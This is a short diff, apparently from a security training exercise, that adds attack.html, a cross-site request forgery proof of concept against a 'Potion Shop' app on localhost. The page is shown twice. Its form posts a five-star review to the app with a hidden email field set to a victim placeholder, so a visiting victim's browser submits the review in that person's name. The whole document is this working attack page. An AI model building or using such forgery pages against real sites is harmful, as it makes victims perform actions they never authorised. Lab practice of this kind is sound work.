realcorvus · June 19, 2024 17:57
diff --git a/attack.html b/attack.html
 <html>

  <h2>CSRF POC for Potion Shop</h2>
  
  <form action="http://localhost:4000/potion/review/2" method="post">
  
    <textarea name="review[body]" required> </textarea>
  
    <select id="review_score" name="review[score]"><option value="1">1</option><option value="2">2</option><option value="3">3</option><option value="4">4</option><option selected value="5">5</option></select>
  
    <input id="review_email" name="review[email]" type="hidden" value="VICTIM_EMAIL_HERE">
  
    <button type="submit">Submit Review</button>
  
  </form>
 </html>
	<html>

	<h2>CSRF POC for Potion Shop</h2>

	<form action="http://localhost:4000/potion/review/2" method="post">

	<textarea name="review[body]" required> </textarea>

	<select id="review_score" name="review[score]"><option value="1">1</option><option value="2">2</option><option value="3">3</option><option value="4">4</option><option selected value="5">5</option></select>

	<input id="review_email" name="review[email]" type="hidden" value="VICTIM_EMAIL_HERE">

	<button type="submit">Submit Review</button>

	</form>
	</html>